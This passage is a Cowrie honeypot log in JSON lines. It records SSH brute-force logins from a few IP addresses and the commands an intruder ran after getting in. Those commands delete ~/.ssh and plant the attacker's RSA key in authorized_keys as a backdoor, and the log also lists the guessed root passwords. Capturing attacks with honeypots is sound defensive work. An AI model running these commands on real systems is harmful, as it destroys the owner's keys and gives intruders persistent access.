{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:13:27.073644Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:13:27.074629Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51616,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e621eea073a","protocol":"ssh","message":"New connection: 212.227.235.229:51616 (1.2.3.4:22) [session: 0e621eea073a]","sensor":"my-vps","timestamp":"2025-09-09T08:13:27.155043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:13:27.156275Z","src_ip":"212.227.235.229","session":"0e621eea073a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:13:27.238148Z","src_ip":"212.227.235.229","session":"0e621eea073a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:13:27.570246Z","src_ip":"212.227.235.229","session":"0e621eea073a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:13:28.655548Z","src_ip":"212.227.235.229","session":"0e621eea073a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51630,"dst_ip":"1.2.3.4","dst_port":22,"session":"daf6dfca8771","protocol":"ssh","message":"New connection: 212.227.235.229:51630 (1.2.3.4:22) [session: daf6dfca8771]","sensor":"my-vps","timestamp":"2025-09-09T08:13:28.739053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:13:28.739963Z","src_ip":"212.227.235.229","session":"daf6dfca8771"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:13:28.823633Z","src_ip":"212.227.235.229","session":"daf6dfca8771"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:13:29.201476Z","src_ip":"212.227.235.229","session":"daf6dfca8771"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:13:29.286508Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:13:29.287327Z","src_ip":"212.227.235.229","session":"daf6dfca8771"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60012,"dst_ip":"1.2.3.4","dst_port":22,"session":"84fd00eb96b3","protocol":"ssh","message":"New connection: 212.227.235.229:60012 (1.2.3.4:22) [session: 84fd00eb96b3]","sensor":"my-vps","timestamp":"2025-09-09T08:14:39.272585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:14:39.273308Z","src_ip":"212.227.235.229","session":"84fd00eb96b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:14:39.358482Z","src_ip":"212.227.235.229","session":"84fd00eb96b3"}
{"eventid":"cowrie.login.failed","username":"test","password":"1q2w3e4r","message":"login attempt [test/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-09T08:14:39.739352Z","src_ip":"212.227.235.229","session":"84fd00eb96b3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:14:40.826884Z","src_ip":"212.227.235.229","session":"84fd00eb96b3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60916,"dst_ip":"1.2.3.4","dst_port":22,"session":"04eb74a7a947","protocol":"ssh","message":"New connection: 217.72.205.35:60916 (1.2.3.4:22) [session: 04eb74a7a947]","sensor":"my-vps","timestamp":"2025-09-09T08:15:18.098266Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:15:18.099774Z","src_ip":"217.72.205.35","session":"04eb74a7a947"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38636,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a30d77e44b7","protocol":"ssh","message":"New connection: 212.227.235.229:38636 (1.2.3.4:22) [session: 3a30d77e44b7]","sensor":"my-vps","timestamp":"2025-09-09T08:15:53.184687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:15:53.185567Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:15:53.269152Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.login.success","username":"root","password":"Mju&Nhy6","message":"login attempt [root/Mju&Nhy6] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:15:53.653839Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:15:53.870295Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:15:53.870987Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:15:53.872144Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:15:53.958275Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:15:54.186908Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:15:54.187643Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:15:54.273452Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:15:54.274621Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38644,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e335dafd98f","protocol":"ssh","message":"New connection: 212.227.235.229:38644 (1.2.3.4:22) [session: 6e335dafd98f]","sensor":"my-vps","timestamp":"2025-09-09T08:15:54.365611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:15:54.366497Z","src_ip":"212.227.235.229","session":"6e335dafd98f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:15:54.449100Z","src_ip":"212.227.235.229","session":"6e335dafd98f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:15:54.831365Z","src_ip":"212.227.235.229","session":"6e335dafd98f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:15:55.917553Z","src_ip":"212.227.235.229","session":"6e335dafd98f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38658,"dst_ip":"1.2.3.4","dst_port":22,"session":"85b085c7f689","protocol":"ssh","message":"New connection: 212.227.235.229:38658 (1.2.3.4:22) [session: 85b085c7f689]","sensor":"my-vps","timestamp":"2025-09-09T08:15:56.001353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:15:56.002294Z","src_ip":"212.227.235.229","session":"85b085c7f689"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:15:56.086131Z","src_ip":"212.227.235.229","session":"85b085c7f689"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:15:56.467812Z","src_ip":"212.227.235.229","session":"85b085c7f689"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:15:56.553552Z","src_ip":"212.227.235.229","session":"3a30d77e44b7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:15:56.554761Z","src_ip":"212.227.235.229","session":"85b085c7f689"}
{"eventid":"cowrie.session.connect","src_ip":"218.250.235.66","src_port":58893,"dst_ip":"1.2.3.4","dst_port":23,"session":"2be5f61be30a","protocol":"telnet","message":"New connection: 218.250.235.66:58893 (1.2.3.4:23) [session: 2be5f61be30a]","sensor":"my-vps","timestamp":"2025-09-09T08:16:08.615017Z"}
{"eventid":"cowrie.session.closed","duration":12.318294525146484,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:16:20.933237Z","src_ip":"218.250.235.66","session":"2be5f61be30a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38228,"dst_ip":"1.2.3.4","dst_port":22,"session":"03fbc05781a3","protocol":"ssh","message":"New connection: 212.227.235.229:38228 (1.2.3.4:22) [session: 03fbc05781a3]","sensor":"my-vps","timestamp":"2025-09-09T08:17:07.625326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:17:07.626505Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:17:07.711027Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#Asd!@#","message":"login attempt [root/!@#Asd!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:17:08.089201Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:17:08.287184Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:17:08.287894Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:17:08.289022Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:17:08.385051Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:17:08.656701Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 